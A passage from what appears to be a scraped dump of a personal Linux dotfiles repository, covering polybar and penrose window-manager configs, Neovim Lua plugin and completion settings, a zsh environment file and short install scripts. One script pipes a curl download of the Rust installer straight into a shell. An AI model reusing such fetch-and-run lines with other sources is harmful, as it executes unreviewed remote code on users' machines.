=\nlabel-empty-padding = 0\n\n[module/xbacklight]\ntype = internal/xbacklight\n\nformat = <label><bar>\nlabel = \"󰃠 \"\nlabel-foreground = ${colors.background}\n\nbar-width = 13\nbar-indicator = \"%{T3}%{T-}\"\nbar-indicator-foreground = ${colors.background}\nbar-indicator-font = 2\nbar-fill = \nbar-fill-font = 2\nbar-fill-foreground = ${colors.background}\nbar-empty = \nbar-empty-font = 2\nbar-empty-foreground = #607290\n\n[module/wlan]\ntype = internal/network\ninterface = wlp58s0\ninterval = 3.0\n\nformat-connected =<ramp-signal>\nlabel-connected = %essid%\n\nlabel-disconnected = 󰤭\nlabel-disconnected-foreground = #6c809e\n\nramp-signal-0 = %{F#ff004b}󰤫%{F-}\nramp-signal-1 = %{F#ffd200}󰤟%{F-}\nramp-signal-2 = 󰤢\nramp-signal-3 = 󰤥\nramp-signal-4 = 󰤨\nramp-signal-foreground = ${colors.foreground-alt}\n\n[module/pulseaudio]\ntype = internal/pulseaudio\n\nformat-volume = <label-volume><bar-volume>\nlabel-volume = \"󰎇 \"\nlabel-volume-foreground = ${root.foreground}\n\nlabel-muted = 󰎊 Muted\nlabel-muted-foreground = #607290\n\nbar-volume-width = 13\nbar-volume-foreground-0 = ${colors.background}\nbar-volume-foreground-1 = ${colors.background}\nbar-volume-foreground-2 = ${colors.background}\nbar-volume-foreground-3 = ${colors.background}\nbar-volume-foreground-4 = #fb8720\nbar-volume-foreground-5 = #fb5a20\nbar-volume-foreground-6 = #fb2020\nbar-volume-gradient = false\nbar-volume-indicator = \"%{T3}%{T-}\"\nbar-volume-indicator-font = 2\nbar-volume-fill = \nbar-volume-fill-font = 2\nbar-volume-empty = \nbar-volume-empty-font = 2\nbar-volume-empty-foreground = #607290\n\n[module/battery]\ntype = internal/battery\nbattery = BAT0\nadapter = AC\nfull-at = 98\n\nformat-charging = %{T3}<label-charging>%{T-}<animation-charging> \n\nformat-discharging = %{T3}<label-discharging>%{T-}<ramp-capacity>\n\nformat-full = %{T3}100%%{T-}󰂄\nformat-full-foreground = ${colors.foreground-alt}\n\nanimation-charging-0 = 󱊤\nanimation-charging-1 = 󱊥\nanimation-charging-2 = 󱊦\nanimation-charging-foreground = ${colors.foreground-alt}\nanimation-charging-framerate = 900\n\nramp-capacity-0 = %{F#ff004b}󰂃%{F-}\nramp-capacity-1 = %{F#ff5300}󰁺%{F-}\nramp-capacity-2 = %{F#ff8000}󰁻%{F-}\nramp-capacity-3 = %{F#ffd200}󰁼%{F-}\nramp-capacity-4 = 󰁽\nramp-capacity-5 = 󰁾\nramp-capacity-6 = 󰁿\nramp-capacity-7 = 󰂀\nramp-capacity-8 = 󰂁\nramp-capacity-9 = 󰂂\nramp-capacity-10 = 󰁹 \nramp-capacity-foreground = ${colors.foreground-alt}\nramp-capacity-framerate = 750\n\n[module/search]\ntype = custom/script\nexec = echo \"󰍉\"\nclick-left = ~/.config/polybar/scripts/search.sh &\n\n[module/file-man]\ntype = custom/script\nexec = echo \"󰉋\"\nclick-left = toggle-lf.sh &\n\n[module/screenshot]\ntype = custom/script\nexec = echo \"󰨤\"\n\nclick-right = scrot \"$(date +%s).png\" -e 'mv \"$f\" ~/Pictures/Screenshots/ && dunstify -r \"991030\" \"Say cheese...\" \"$f\" -a scrot' &\n\nclick-left = image=$(date +%s).png && maim -s -s -b 5.0 -p -5 -c 1,0,0.294 \"$HOME/Pictures/Screenshots/$image\" && dunstify -r \"991030\" \"Say cheese...\" \"$image\" -a scrot &\n\n[module/prev]\ntype = custom/script\nexec = echo \"%{T5}%{T-}\" &\nformat = \"%{F#e5efff}<label>%{F-}\"\ninterval = 600\ntail = true\n\nclick-left = playerctl --player=spotify previous &\n\n[module/info]\ntype = custom/script\nexec = echo \"\" &\ninterval = 600\ntail = true\n\nclick-left = ~/.config/polybar/scripts/info.sh 2>/dev/null &\nclick-right = bspc desktop -f '^10'\n\n[module/toggle]\ntype = custom/script\nexec = [[ \"$(playerctl -p spotify status 2>/dev/null)\" == \"Playing\" ]] && echo \"\" || echo \"\"\ninterval = 0.2\n\ntail = true\nclick-left = playerctl --player=spotify play-pause &\n\n[module/right]\ntype = custom/text\ncontent-background = #00000000\ncontent-foreground = #df191414\ncontent = \"\"\n\n[module/song]\ntype = custom/script\nexec = ~/.config/polybar/scripts/song.sh 2>/dev/null || echo \"No player found\"\nformat = \"<label> \"\nformat-prefix = \"%{F#1db954}  %{F-}\"\nformat-background = #df191414\ninterval = 600\n\ntail = true\nclick-left = bspc desktop -f ^10 &\n\n[module/left]\ntype = custom/text\ncontent-background = #00000000\ncontent-foreground = #df191414\ncontent =\"\"\n\n[module/next]\ntype = custom/script\nexec = echo \"%{T5}%{T-}\" &\nformat = \"%{F#e5efff}<label>%{F-}\"\ninterval = 600\n\ntail = true\nclick-left = playerctl --player=spotify next &\n\n[module/close-menu]\ntype = custom/script\nexec = echo \"%{O2}󰅂\" &\ninterval = 600\n\ntail = true\n\n[module/cpu]\ntype = custom/script\nexec = ~/.config/polybar/scripts/cpu.sh 2> /dev/null || echo \"%{T5}%{F#dae1ec}󰓦%{T4}%{O-13}󰓦%{T-}%{F-}\" \nformat-prefix = \" \"\nformat-foreground = ${colors.secondary}\n\ninterval = 1\ntail = true\n\nclick-left = pgrep gotop && xdotool search --name \"gotop\" windowactivate || alacritty -t gotop -e gotop &\n\n[module/update]\ntype = custom/script\nexec = ~/.config/polybar/scripts/update.sh 2> /dev/null || echo \"󰏗%{T5}%{F#dae1ec}󰓦%{T4}%{O-13}󰓦%{T-}%{F-}\"\nformat-foreground = ${colors.secondary}\ninterval = 1\n\ntail =true\n\n[module/news]\ntype = custom/script\nexec = ~/.config/polybar/scripts/news.sh 2> /dev/null || echo \"󰋻%{T5}%{F#dae1ec}󰓦%{T4}%{O-13}󰓦%{T-}%{F-}\"\nformat-foreground = ${colors.secondary}\ninterval = 1\n\ntail = true\nclick-left = start-newsboat.sh &\n\n[module/mtorrent]\ntype = custom/script\nexec = echo \"󱋌 \" || echo \"󱋖 \" \nformat-foreground = ${colors.secondary}\ninterval = 1\n\ntail = true\n\n[module/open-menu]\ntype = custom/script\nexec = echo \"%{O-3}󰅁\"\ninterval = 600\n\ntail = true\n\n[module/bluetooth]\ntype = custom/script\nexec = ~/.config/polybar/scripts/bluetooth-status.sh &\nformat-foreground = ${colors.foreground-alt}\ninterval = 0.5\n\ntail = true\nclick-left = ~/.config/polybar/scripts/bluetooth-status.sh -t &\n\n[module/date]\ntype = custom/script\nexec = date '+%a %e %b %H:%M' \ninterval = 60\ntail=true\n\nclick-left = ~/.config/polybar/scripts/calendar.sh &\n\n[module/power-menu]\ntype = custom/script\nexec = echo \"󰐥 \"\n\n[settings]\nscreenchange-reload = false\npseudo-transparency = false\n\n[global/wm]\nmargin-top = 3\nmargin-bottom = 5\n\n; vim:ft=dosini\n" }, { "alpha_fraction": 0.57351154088974, "alphanum_fraction": 0.5788578391075134, "avg_line_length": 37.82075500488281, "blob_id": "cbe21ab902c4fc8e5216a3e0dc70a185da2f517c", "content_id": "b39fb500284b229e3c267a7bc5b4dd8f6f95c134", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 4115, "license_type": "no_license", "max_line_length": 98, "num_lines": 106, "path": "/penrose/src/main.rs", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "/**\n * My personal penrose config (build from the head of develop)\n */\n#[macro_use]\nextern crate penrose;\n\nuse penrose::helpers::spawn;\nuse penrose::hooks::LayoutHook;\nuse penrose::layout::{bottom_stack, paper, side_stack};\nuse penrose::{\n Backward, Config, Forward, Layout, LayoutConf, Less, More, WindowManager, XcbConnection,\n};\nuse simplelog::{LevelFilter, SimpleLogger};\nuse std::env;\nuse std::process::Command;\n\nfn main() {\n SimpleLogger::init(LevelFilter::Info, simplelog::Config::default()).unwrap();\n\n let mut config = Config::default();\n config.workspaces = &[\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"];\n config.fonts = &[\"ProFont For Powerline:size=10\", \"Iosevka Nerd Font:size=10\"];\n config.floating_classes = &[\"rofi\", \"dmenu\", \"dunst\", \"polybar\", \"pinentry-gtk-2\"];\n\n let follow_focus_conf = LayoutConf {\n floating: false,\n gapless: true,\n follow_focus: true,\n };\n let n_main = 1;\n let ratio = 0.6;\n config.layouts = vec![\n Layout::new(\"[side]\", LayoutConf::default(), side_stack, n_main, ratio),\n Layout::new(\"[botm]\", LayoutConf::default(), bottom_stack, n_main, ratio),\n Layout::new(\"[papr]\", follow_focus_conf, paper, n_main, ratio),\n Layout::floating(\"[----]\"),\n ];\n\n let home = env::var(\"HOME\").unwrap();\n let power_script = format!(\"{}/bin/scripts/power-menu.sh\", home);\n let power_menu = Box::new(move |wm: &mut WindowManager| {\n match Command::new(&power_script).output() {\n Ok(choice) => {\n match String::from_utf8(choice.stdout).unwrap().as_str() {\n \"restart-wm\\n\" => wm.exit(),\n _ => (), // other options are handled by the script\n }\n }\n Err(_) => return, // user exited without making a choice\n };\n });\n\n let key_bindings = gen_keybindings! {\n // Program launch\n \"M-semicolon\" => run_external!(\"rofi-apps\"),\n \"M-Return\" => run_external!(\"st\"),\n\n // actions\n \"M-A-s\" => run_external!(\"screenshot\"),\n \"M-A-k\" => run_external!(\"toggle-kb-for-tada\"),\n \"M-A-l\" => run_external!(\"lock-screen\"),\n \"M-A-m\" => run_external!(\"xrandr --output HDMI-1 --auto --right-of eDP-1 \"),\n\n // client management\n \"M-j\" => run_internal!(cycle_client, Forward),\n \"M-k\" => run_internal!(cycle_client, Backward),\n \"M-S-j\" => run_internal!(drag_client, Forward),\n \"M-S-k\" => run_internal!(drag_client, Backward),\n \"M-S-q\" => run_internal!(kill_client),\n\n // workspace management\n \"M-Tab\" => run_internal!(toggle_workspace),\n \"M-bracketright\" => run_internal!(cycle_screen, Forward),\n \"M-bracketleft\" => run_internal!(cycle_screen, Backward),\n \"M-S-bracketright\" => run_internal!(drag_workspace, Forward),\n \"M-S-bracketleft\" => run_internal!(drag_workspace, Backward),\n\n // Layout & window management\n \"M-grave\" => run_internal!(cycle_layout, Forward),\n \"M-S-grave\" => run_internal!(cycle_layout, Backward),\n \"M-A-Up\" => run_internal!(update_max_main, More),\n \"M-A-Down\" => run_internal!(update_max_main, Less),\n \"M-A-Right\" => run_internal!(update_main_ratio, More),\n \"M-A-Left\" => run_internal!(update_main_ratio, Less),\n \"M-A-C-Escape\" => run_internal!(exit),\n \"M-A-Escape\" => power_menu;\n\n forall_workspaces: config.workspaces => {\n \"M-{}\" => focus_workspace,\n \"M-S-{}\" => client_to_workspace,\n }\n };\n\n // Set the root X window name to be the active layout symbol so it can be picked up by polybar\n let active_layout_as_root_name: LayoutHook = |wm: &mut WindowManager, _, _| {\n wm.set_root_window_name(wm.current_layout_symbol());\n };\n config.layout_hooks.push(active_layout_as_root_name);\n\n let conn = XcbConnection::new();\n let mut wm = WindowManager::init(config, &conn);\n\n spawn(format!(\"{}/bin/scripts/penrose-startup.sh\", home));\n active_layout_as_root_name(&mut wm, 0, 0);\n wm.grab_keys_and_run(key_bindings);\n}\n" }, { "alpha_fraction": 0.7851239442825317, "alphanum_fraction": 0.7851239442825317, "avg_line_length": 16.285715103149414, "blob_id": "9adacab1305e6f37279e7e4427b1b050eec33ad3", "content_id": "e7784b1f116545e3a2e941096fbdef3f06a2e0d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 121, "license_type": "no_license", "max_line_length": 21, "num_lines": 7, "path": "/install.sh", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "sudo dependencies.sh\nsh oh-my-zsh.sh\nsh config.sh\nsh powerline-fonts.sh\nsh source-code-pro.sh\nsh rust.sh\nsh gitconfig.sh\n" }, { "alpha_fraction": 0.5882353186607361, "alphanum_fraction": 0.5882353186607361, "avg_line_length": 71.25, "blob_id": "7ac99f0d566aa1ce34c23ee4bdecc815c0569265", "content_id": "ffae060bdfa2d99b54221e4c33aa0d7468b374d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Lua", "length_bytes": 289, "license_type": "no_license", "max_line_length": 110, "num_lines": 4, "path": "/nvim/oldconfig/lua/autocommands.lua", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "vim.cmd([[autocmd CursorHold,CursorHoldI * lua require'nvim-lightbulb'.update_lightbulb()]])\n-- For transparent background\nvim.cmd([[autocmd ColorScheme * hi clear CursorLine]])\nvim.cmd([[au FileType rust let b:AutoPairs = {'(':')', '[':']', '{':'}','\"':'\"', '`':'`', '|':'|', '<':'>'}]])\n" }, { "alpha_fraction": 0.6541176438331604, "alphanum_fraction": 0.7005882263183594, "avg_line_length": 17.085105895996094, "blob_id": "9f715425fde9f852f38793e0f7cee12bc271ce80", "content_id": "17c2b9472adb94c4c68dea7a7af51a9704b0645e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 1704, "license_type": "no_license", "max_line_length": 76, "num_lines": 94, "path": "/penrose/config/polybar/config.ini", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "[global/wm]\nmargin-bottom = 0\nmargin-top = 0\n\n[bar/main]\nmonitor = ${env:MONITOR:}\nmonitor-strict = false\noverride-redirect = true\nbottom = false\nfixed-center = true\nwidth = 100%\nheight = 18\nbackground = ${color.bg}\nforeground = ${color.fg}\nfont-0 = \"ProFont for Powerline:size=11;2\"\nfont-1 = \"Iosevka Nerd Font:size=12;2\"\n\nmodules-left = logo ewmh layout\nmodules-center = title\nmodules-right = kb date\nspacing = 0\ndim-value = 1.0\nwm-name = penrose\n\ntray-position = right\ntray-detached = false\ntray-maxsize = 16\ntray-background = ${color.bg}\n\n\n[color]\nbg = #282828\nfg = #EBDBB2\nbg-alt = #1d2021\nfg-alt = #F9F5D7\ngrey = #504945\nlight-grey = #928374\n\nred = #CC241D\ngreen = #B8BB26\nyellow = #D79921\nblue = #458588\npurple = #B16286\n\n\n[module/ewmh]\ntype = internal/xworkspaces\npin-workspaces = false\n\nformat = <label-state>\nlabel-active-foreground = ${color.fg}\nlabel-occupied-foreground = ${color.light-grey}\nlabel-urgent-foreground = ${color.red}\nlabel-empty-foreground = ${color.grey}\n\n[module/kb]\ntype = internal/xkeyboard\n\n[module/logo]\ntype = custom/text\n\ncontent = \ncontent-background = ${color.blue}\ncontent-foreground = ${color.fg}\ncontent-padding = 1\n\n\n[module/date]\ntype = internal/date\n\ninterval = 1.0\ntime = %I:%M %p\nformat = <label>\nformat-background = ${color.bg}\nformat-padding = 2\nlabel = %time%\n\n[module/title]\ntype = internal/xwindow\n\nformat = <label>\nformat-prefix = \" \"\nformat-prefix-foreground = ${color.blue}\nlabel = %title%\nlabel-maxlen = 30\nlabel-empty = penrose\n\n[module/layout]\ntype = custom/script\nexec = awk '/\\[INFO\\] ACTIVE_LAYOUT/ { print $4 }' ~/.penrose.log | tail -n1\ninterval = 1\nformat-padding = 1\n; exec = ~/.config/polybar/layout_from_penrose_log.sh\n; tail = true\n" }, { "alpha_fraction": 0.797468364238739, "alphanum_fraction": 0.797468364238739, "avg_line_length": 25.33333396911621, "blob_id": "10c0549daecb13fdbda7a0d676cb22d8e6f8e08b", "content_id": "521297f1e124db528bb8c1c0ca072f5c2e3646fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 79, "license_type": "no_license", "max_line_length": 48, "num_lines": 3, "path": "/alacritty.sh", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "git clone https://github.com/jwilm/alacritty.git\ncd alacritty\ncargo install -f\n" }, { "alpha_fraction": 0.587437093257904, "alphanum_fraction": 0.5935653448104858, "avg_line_length": 31.176055908203125, "blob_id": "46e52699c5e36c1d444a727a8463f1166f7a4a4f", "content_id": "4e542c2015e259ab60bf2b683693fb8d26f4ca08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Lua", "length_bytes": 4573, "license_type": "no_license", "max_line_length": 159, "num_lines": 142, "path": "/nvim/oldconfig/lua/compe-completion.lua", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "-- Setup nvim-cmp.\nlocal cmp = require'cmp'\nvim.o.completeopt = \"menu,menuone,noselect\"\n\ncmp.setup({\n --snippet = {\n -- -- REQUIRED - you must specify a snippet engine\n -- expand = function(args)\n -- vim.fn[\"vsnip#anonymous\"](args.body) -- For `vsnip` users.\n -- -- require('luasnip').lsp_expand(args.body) -- For `luasnip` users.\n -- -- require('snippy').expand_snippet(args.body) -- For `snippy` users.\n -- -- vim.fn[\"UltiSnips#Anon\"](args.body) -- For `ultisnips` users.\n -- end,\n --},\n mapping = cmp.mapping.preset.insert({\n ['<C-b>'] = cmp.mapping.scroll_docs(-4),\n ['<C-f>'] = cmp.mapping.scroll_docs(4),\n ['<C-Space>'] = cmp.mapping.complete({}),\n ['<C-e>'] = cmp.mapping.abort(),\n ['<CR>'] = cmp.mapping.confirm({ select = true }), -- Accept currently selected item. Set `select` to `false` to only confirm explicitly selected items.\n ['<TAB>'] = cmp.mapping.confirm({ select = true }), -- Accept currently selected item. Set `select` to `false` to only confirm explicitly selected items.\n }),\n sources = cmp.config.sources({\n { name = 'nvim_lsp' },\n { name = 'vsnip' }, -- For vsnip users.\n -- { name = 'luasnip' }, -- For luasnip users.\n -- { name = 'ultisnips' }, -- For ultisnips users.\n -- { name = 'snippy' }, -- For snippy users.\n }, {\n { name = 'buffer' },\n })\n})\n\n-- Set configuration for specific filetype.\ncmp.setup.filetype('gitcommit', {\n sources = cmp.config.sources({\n { name = 'cmp_git' }, -- You can specify the `cmp_git` source if you were installed it. \n }, {\n { name = 'buffer' },\n })\n})\n\n-- Use buffer source for `/` (if you enabled `native_menu`, this won't work anymore).\ncmp.setup.cmdline('/', {\n sources = {\n { name = 'buffer' }\n }\n})\n\n-- Use cmdline & path source for ':' (if you enabled `native_menu`, this won't work anymore).\ncmp.setup.cmdline(':', {\n sources = cmp.config.sources({\n { name = 'path' }\n }, {\n { name = 'cmdline' }\n })\n})\n\n-- Setup lspconfig.\nlocal capabilities = require('cmp_nvim_lsp').default_capabilities(vim.lsp.protocol.make_client_capabilities())\n-- Replace <YOUR_LSP_SERVER> with each lsp server you've enabled.\n--require('lspconfig')['rust_analyzer'].setup {\n-- capabilities = capabilities\n--}\n--vim.o.completeopt = \"menuone,noselect\"\n--\n--require(\"compe\").setup({\n--\tenabled = true,\n--\tautocomplete = true,\n--\tdebug = false,\n--\tmin_length = 1,\n--\tpreselect = \"enable\",\n--\tthrottle_time = 80,\n--\tsource_timeout = 200,\n--\tincomplete_delay = 400,\n--\tmax_abbr_width = 100,\n--\tmax_kind_width = 100,\n--\tmax_menu_width = 100,\n--\tdocumentation = true,\n--\tsource = {\n--\t\tbuffer = { kind = \"﬘\", true },\n--\t\tvsnip = { kind = \"﬌\" }, --replace to what sign you prefer\n--\t\tnvim_lsp = true,\n--\t\tpath = true,\n--\t},\n--})\n--\n--local t = function(str)\n--\treturn vim.api.nvim_replace_termcodes(str, true, true, true)\n--end\n--\n--local check_back_space = function()\n--\tlocal col = vim.fn.col(\".\") - 1\n--\tif col == 0 or vim.fn.getline(\".\"):sub(col, col):match(\"%s\") then\n--\t\treturn true\n--\telse\n--\t\treturn false\n--\tend\n--end\n--\n---- tab completion\n--\n--_G.tab_complete = function()\n--\tif vim.fn.pumvisible() == 1 then\n--\t\treturn t(\"<C-n>\")\n--\telseif check_back_space() then\n--\t\treturn t(\"<Tab>\")\n--\telse\n--\t\treturn vim.fn[\"compe#complete\"]()\n--\tend\n--end\n--_G.s_tab_complete = function()\n--\tif vim.fn.pumvisible() == 1 then\n--\t\treturn t(\"<C-p>\")\n--\telseif vim.fn.call(\"vsnip#jumpable\", { -1 }) == 1 then\n--\t\treturn t(\"<Plug>(vsnip-jump-prev)\")\n--\telse\n--\t\treturn t(\"<S-Tab>\")\n--\tend\n--end\n--\n---- mappings\n--\n--vim.api.nvim_set_keymap(\"i\", \"<C-SPACE>\", \"compe#complete()\", { expr = true, silent = true })\n--vim.api.nvim_set_keymap(\"i\", \"<CR>\", [[compe#confirm(luaeval(\"require 'nvim-autopairs'.autopairs_cr()))]], { expr = true, silent = true })\n----vim.api.nvim_set_keymap(\"i\", \"<CR>\", \"compe#confirm('<CR>')\", { expr = true, silent = true })\n--vim.api.nvim_set_keymap(\"i\", \"<Tab>\", \"v:lua.tab_complete()\", { expr = true })\n--vim.api.nvim_set_keymap(\"s\", \"<Tab>\", \"v:lua.tab_complete()\", { expr = true })\n--vim.api.nvim_set_keymap(\"i\", \"<S-Tab>\", \"v:lua.s_tab_complete()\", { expr = true })\n--vim.api.nvim_set_keymap(\"s\", \"<S-Tab>\", \"v:lua.s_tab_complete()\", { expr = true })\n--\n--function _G.completions()\n--\tlocal npairs = require(\"nvim-autopairs\")\n--\tif vim.fn.pumvisible() == 1 then\n--\t\tif vim.fn.complete_info()[\"selected\"] ~= -1 then\n--\t\t\treturn vim.fn[\"compe#confirm\"](\"<CR>\")\n--\t\tend\n--\tend\n--\treturn npairs.check_break_line_char()\n--end\n--\n--vim.api.nvim_set_keymap(\"i\", \"<CR>\", \"v:lua.completions()\", { expr = true })\n" }, { "alpha_fraction": 0.8194444179534912, "alphanum_fraction": 0.8194444179534912, "avg_line_length": 26, "blob_id": "1d7ea011b6c11a21a0f4bd0c31cae8f370c52d3b", "content_id": "d6a93749bf033b6a1057eff448a92c8cf87461be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 216, "license_type": "no_license", "max_line_length": 35, "num_lines": 8, "path": "/rust.sh", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "curl https://sh.rustup.rs -sSf | sh\nrustup component add rls\nrustup component add rust-analysis\nrustup component add rust-src\ncargo install racer\ncargo install rustfmt\ncargo install cargo-watch\ncargo install rustsym\n" }, { "alpha_fraction": 0.661556601524353, "alphanum_fraction": 0.661556601524353, "avg_line_length": 55.53333282470703, "blob_id": "e888201aab40c053243eb6c4f32bbf474d6e7b15", "content_id": "213eee320d78c42df23ff04fdcd8eb944a4c1558", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Lua", "length_bytes": 848, "license_type": "no_license", "max_line_length": 118, "num_lines": 15, "path": "/nvim/oldconfig/lua/telescope-nvim.lua", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "require('telescope').setup {}\n\n--require('telescope').load_extension('fzy_native')\n--require('telescope').load_extension('fzf')\n\nlocal opt = { noremap = true, silent = true }\n\n\n-- mappings\n-- vim.api.nvim_set_keymap(\"n\", \"<Leader>pf\", [[<Cmd>lua require('telescope.builtin').find_files()<CR>]], opt)\n--vim.api.nvim_set_keymap(\"n\", \"<Leader>pf\", [[<Cmd>lua require('telescope').extensions.fzf_writer.files()<CR>]], opt)\nvim.api.nvim_set_keymap(\"n\", \"<Leader>pf\", [[<Cmd>lua require('telescope.builtin').find_files()<CR>]], opt)\nvim.api.nvim_set_keymap(\"n\", \"<Leader>pb\", [[<Cmd>lua require('telescope.builtin').buffers()<CR>]], opt)\nvim.api.nvim_set_keymap(\"n\", \"<Leader>fr\", [[<Cmd>lua require('telescope.builtin').reloader()<CR>]], opt)\nvim.api.nvim_set_keymap(\"n\", \"<Leader>gb\", [[<Cmd>lua require('telescope.builtin').git_branches()<CR>]], opt)\n" }, { "alpha_fraction": 0.7382199168205261, "alphanum_fraction": 0.7726252675056458, "avg_line_length": 46.75, "blob_id": "efe52397d9bbca9147f89c6ff4f735fe7a1ed39f", "content_id": "e7bcc4911196902d1d9cc06411ef1a00452bf522", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1337, "license_type": "no_license", "max_line_length": 473, "num_lines": 28, "path": "/zsh/.zshenv", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "export GOPATH=$HOME/.go\nexport PATH=\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:$HOME/ldc/bin:$HOME/src/DCD/bin:$HOME/src/dfmt/bin:$HOME/.cargo/bin:$HOME/Qt/5.8/gcc_64/lib:$HOME/teamspeak:$HOME/.local/bin:$HOME/Downloads/android-ndk-r15b:$HOME/Downloads/android-ndk-r15b/toolchains/arm-linux-androideabi-4.9/prebuilt/linux-x86_64/bin:$GOPATH/bin:/usr/bin/core_perl/:/opt/miniconda3/bin:/opt/android-sdk-linux/platform-tools:$HOME/.config/rofi/scripts\"\n# export MANPATH=\"/usr/local/man:$MANPATH\"\n#\n# export RUST_SRC_PATH=$HOME/.rustup/toolchains/stable-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/src/\n\nexport LD_LIBRARY_PATH=\"$HOME/VulkanSDK/newest/x86_64/lib:$HOME/Qt/5.8/gcc_64/lib\"\n# export VK_LAYER_PATH=$HOME/VulkanSDK/newest/x86_64/etc/explicit_layer.d\n\nexport CARGO_HOME=$HOME/.cargo\n#export TERM=xterm-256color\nexport CARGO_INCREMENTAL=1\nexport RUSTC_FORCE_INCREMENTAL=1\n\nexport _JAVA_AWT_WM_NONREPARENTING=1\nexport WAYLAND_DISPLAY=alacritty\n\nexport BROWSER=firefox\nexport XDG_CONFIG_HOME=\"$HOME/.config\"\nexport DISABLE_AUTO_UPDATE=\"true\"\n# export WINIT_HIDPI_FACTOR=1\n# export TERM=tmux-256color\n# export TERM=xterm-256color\nsource \"$HOME/.cargo/env\"\nsource \"/etc/profile.d/flatpak.sh\"\n\nexport ANDROID_SDK_ROOT=/opt/android-sdk-linux\nexport ANDROID_NDK_ROOT=/opt/android-ndk-r21d\n" }, { "alpha_fraction": 0.6446930766105652, "alphanum_fraction": 0.6546719074249268, "avg_line_length": 26.330577850341797, "blob_id": "53a395659942145fe5bba8238b36ce7b7c65aefa", "content_id": "0ceddd70991496012419b8d65cb2a60f25c614e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Lua", "length_bytes": 3323, "license_type": "no_license", "max_line_length": 82, "num_lines": 121, "path": "/nvim/oldconfig/lua/pluginList.lua", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "local packer = require(\"packer\")\nlocal use = packer.use\nvim.api.nvim_command([[autocmd BufWritePost pluginList.lua PackerCompile]])\n\n-- using { } for using different branch , loading plugin with certain commands etc\nreturn require(\"packer\").startup(function()\n\n\tuse(\"wbthomason/packer.nvim\")\n use { 'ibhagwan/fzf-lua',\n -- optional for icon support\n requires = { 'nvim-tree/nvim-web-devicons' }\n }\n\n\t-- color related stuff\n\tuse(\"siduck76/nvim-base16.lua\")\n\tuse(\"norcalli/nvim-colorizer.lua\")\n\tuse(\"ishan9299/nvim-solarized-lua\")\n\n\t-- lang stuff\n\tuse(\"nvim-treesitter/nvim-treesitter\")\n use 'nvim-treesitter/nvim-treesitter-context'\n\tuse(\"neovim/nvim-lspconfig\")\n --use('glepnir/lspsaga.nvim')\n\t-- use(\"hrsh7th/nvim-compe\")\n use({\n \"ggandor/leap.nvim\",\n\t\tconfig = function()\n\t\t\trequire(\"leap\").setup({\n\t\t\t})\n\t\tend,\n })\n use(\"hrsh7th/cmp-nvim-lsp\")\n use(\"hrsh7th/cmp-buffer\")\n use(\"hrsh7th/cmp-path\")\n use(\"hrsh7th/cmp-cmdline\")\n use(\"hrsh7th/nvim-cmp\")\n\tuse(\"onsails/lspkind-nvim\")\n\tuse(\"sbdchd/neoformat\")\n\tuse(\"nvim-lua/plenary.nvim\")\n use('williamboman/nvim-lsp-installer')\n use {\n \"williamboman/mason.nvim\",\n \"williamboman/mason-lspconfig.nvim\",\n }\n\tuse(\"nvim-lua/lsp_extensions.nvim\")\n use({\n 'weilbith/nvim-code-action-menu',\n cmd = 'CodeActionMenu',\n })\n\tuse(\"ray-x/lsp_signature.nvim\")\n\tuse(\"kosayoda/nvim-lightbulb\")\n\tuse(\"mfussenegger/nvim-dap\")\n\tuse({ \"rcarriga/nvim-dap-ui\", requires = { \"mfussenegger/nvim-dap\" } })\n use(\"beyondmarc/hlsl.vim\")\n\tuse({\n\t\t\"folke/trouble.nvim\",\n\t\t--requires = \"kyazdani42/nvim-web-devicons\",\n\t\tconfig = function()\n\t\t\trequire(\"trouble\").setup({\n\t\t\t})\n\t\tend,\n\t})\n use(\"gfanto/fzf-lsp.nvim\")\n\n\tuse(\"akinsho/nvim-bufferline.lua\")\n\tuse(\"windwp/nvim-autopairs\")\n use(\"jiangmiao/auto-pairs\")\n\tuse(\"alvan/vim-closetag\")\n use(\"tpope/vim-surround\")\n\n\tuse(\"kburdett/vim-nuuid\")\n\t--use(\"thaerkh/vim-workspace\")\n\t-- snippet support\n\tuse(\"hrsh7th/vim-vsnip\")\n\tuse(\"rafamadriz/friendly-snippets\")\n\n\t-- file managing , picker etc\n\tuse(\"kyazdani42/nvim-tree.lua\")\n\tuse(\"kyazdani42/nvim-web-devicons\")\n\t--use(\"ryanoasis/vim-devicons\")\n\tuse(\"nvim-telescope/telescope.nvim\")\n\tuse(\"nvim-telescope/telescope-media-files.nvim\")\n\tuse(\"nvim-lua/popup.nvim\")\n\n\t-- misc\n\tuse(\"rmagatti/auto-session\")\n\tuse(\"tweekmonster/startuptime.vim\")\n\tuse(\"907th/vim-auto-save\")\n\tuse(\"karb94/neoscroll.nvim\")\n\tuse(\"kdav5758/TrueZen.nvim\")\n\tuse(\"folke/which-key.nvim\")\n\tuse(\"nvim-telescope/telescope-fzf-writer.nvim\")\n use 'nvim-telescope/telescope-fzy-native.nvim'\n use {'nvim-telescope/telescope-fzf-native.nvim', run = 'make' 